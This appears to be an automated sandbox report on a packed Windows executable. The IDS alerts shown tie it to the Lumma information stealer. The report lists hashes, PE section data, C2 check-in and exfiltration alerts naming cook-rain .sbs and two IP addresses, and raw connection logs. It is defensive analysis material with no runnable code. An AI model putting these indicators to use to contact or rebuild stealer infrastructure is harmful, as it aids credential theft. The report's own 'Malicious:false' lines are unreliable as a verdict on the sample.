                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):33370
                                                                                                                                                                        Entropy (8bit):7.973675198531228
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                        MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                        SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                        SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                        SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
                                                                                                                                                                        Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.947270667651331
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:file.exe
                                                                                                                                                                        File size:1'841'152 bytes
                                                                                                                                                                        MD5:af5975cd36b5096ac13f087ccd77ed34
                                                                                                                                                                        SHA1:e9f010595b29a3fb4acbebea522fa83e3b25de65
                                                                                                                                                                        SHA256:d0c28013e3bb4e0cb20b06af7f90dcfb9ef5c5ca6d9db4a438e09f20a3dd3a96
                                                                                                                                                                        SHA512:121c72af9f4505f0e812ca92e0c6045771e8b4e15fe19b0ec5d1ba288192fbb303480e3f73dfd193b2ede40dfda1968cc7969cb9dfb5332fef3fb8d55500f51f
                                                                                                                                                                        SSDEEP:49152:SHiaOg/OamYJhch4dvqBQQqTy63OJUUohei:SC3gW2jdyyy6+I4i
                                                                                                                                                                        TLSH:73853352A47E19F7C068817E08F4D1AA69B32DBE9D1EDAB6D9C4057E7803CC052F33A5
                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g..............................I...........@..........................@I.....LZ....@.................................\p..p..
                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                        Entrypoint:0x891000
                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:6
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp 00007F82E8D56A9Ah
                                                                                                                                                                        psadbw mm3, qword ptr [ebx]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add cl, ch
                                                                                                                                                                        add byte ptr [eax], ah
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], dl
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [0000000Ah], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [0000000Ah], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add al, 0Ah
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x2b0.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        0x10000x550000x25e00f3d75f7e15a9261059e3048d1998f65eFalse0.9974860767326733data7.978780458384677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x560000x2b00x2004b2d7a6cf5d1b329d981dc9ad7ce8f29False0.80078125data6.020620021412052IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        0x580000x2a00000x200029c5a81927e30c30aecab021ce4fb02unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        ihjtxazo0x2f80000x1980000x197e002c286beca6b638264f4e7b97a2a5f092False0.9943142095081213data7.953905732453634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        tktzhwro0x4900000x10000x4007834bf0263a5f9bb061c0ad5852abd75False0.75data6.0213943272292845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .taggant0x4910000x30000x220061f8bc427828338bdf0b697a38450be6False0.06387867647058823DOS executable (COM)0.7331345975839219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_MANIFEST0x48f9f40x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                        DLLImport
                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-11-21T10:37:19.039633+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.6641721.1.1.153UDP
                                                                                                                                                                        2024-11-21T10:37:20.773793+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:20.773793+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:21.468898+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:21.468898+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649720188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:22.795011+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649726188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:22.795011+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649726188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:23.486841+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649726188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:23.486841+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649726188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:25.115378+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649733188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:25.115378+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649733188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:26.059163+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649733188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:27.812787+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649739188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:27.812787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:30.767198+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649750188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:30.767198+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649750188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:34.080660+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649757188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:34.080660+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649757188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:37.191404+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649766188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:37.191404+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649766188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:42.486530+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.649781188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:42.486530+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649781188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:43.181989+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649781188.114.97.3443TCP
                                                                                                                                                                        2024-11-21T10:37:44.699485+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649787185.215.113.1680TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 21, 2024 10:37:12.061359882 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.061969042 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.062047958 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.115344048 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.115941048 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.115941048 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.181575060 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.181615114 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.181679010 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.181708097 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.181735992 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.235526085 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.235614061 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.235668898 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.235697031 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.235723972 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.581578970 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.581676006 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.581712961 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.581743956 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.581752062 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.581803083 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.590336084 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.590356112 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.590404987 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.598161936 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.600788116 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.600837946 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.600883961 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.609098911 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.609153986 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.633502007 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.633547068 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.633625984 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.634171009 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.634191990 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.708954096 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.709017992 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.709054947 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.709095955 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.709101915 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.709131002 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.709136963 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.709166050 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.709219933 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.717212915 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.717575073 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.717721939 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.725747108 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.725826979 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.725886106 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.733920097 CET4434970920.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.782789946 CET49709443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:37:12.918801069 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.918951035 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.923204899 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.923218012 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.923491955 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.926485062 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.926532984 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.926538944 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:12.926640034 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:12.967339993 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:13.328003883 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:13.328095913 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:13.328155041 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:13.328403950 CET49710443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:13.328421116 CET4434971040.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:13.657829046 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:13.658052921 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:13.985974073 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                        Nov 21, 2024 10:37:14.462291956 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.462482929 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.465890884 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.465902090 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.466238976 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.468612909 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.469280958 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.469285965 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.469420910 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.515331984 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.629338980 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:14.629381895 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.629487991 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:14.629863977 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:14.629875898 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.987962008 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.988178015 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:14.988261938 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.988379955 CET49712443192.168.2.640.113.103.199
                                                                                                                                                                        Nov 21, 2024 10:37:14.988394976 CET4434971240.113.103.199192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.483652115 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.483717918 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:16.488651991 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:16.488663912 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.489083052 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.499631882 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:16.543342113 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.976067066 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.976130009 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.976172924 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.976258993 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:16.976281881 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:16.976455927 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.173199892 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.173268080 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.173320055 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.173356056 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.173415899 CET49713443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:17.328720093 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.328773022 CET4434971313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:17.328810930 CET49713443192.168.2.613.107.246.60
